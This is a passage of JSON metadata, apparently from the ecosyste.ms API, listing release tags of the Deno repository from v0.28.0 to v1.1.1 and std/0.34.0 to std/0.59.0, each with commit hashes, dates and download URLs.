//github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_